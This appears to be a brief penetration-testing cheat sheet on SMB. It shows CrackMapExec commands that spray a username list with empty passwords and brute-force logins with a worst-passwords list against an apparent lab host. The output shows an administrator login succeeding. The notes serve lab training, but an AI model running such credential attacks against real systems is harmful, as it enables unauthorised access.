SMB
CRACKMAPEXEC: PASSWORDLESS SMB SERVER MISCONFIGURATION
root@oco:~$ crackmapexec smb 10.129.95.200 -u top-usernames-shortlist.txt -p ""
SMB 10.129.95.200 445 TACTICS [*] Windows 10 / Server 2019 Build 17763 x64 (name:TACTICS) (domain:Tactics) (signing:False) (SMBv1:False)
SMB 10.129.95.200 445 TACTICS [-] Tactics\root: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\admin: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\test: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\guest: STATUS_ACCOUNT_DISABLED
SMB 10.129.95.200 445 TACTICS [-] Tactics\info: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\adm: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\mysql: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [-] Tactics\user: STATUS_LOGON_FAILURE
SMB 10.129.95.200 445 TACTICS [+] Tactics\administrator: (Pwn3d!)
BRUTE FORCING CREDENTIALS
root@oco:~$ crackmapexec smb 10.129.95.200 -u top-usernames-shortlist.txt -p 500-worst-passwords.txt
Last updated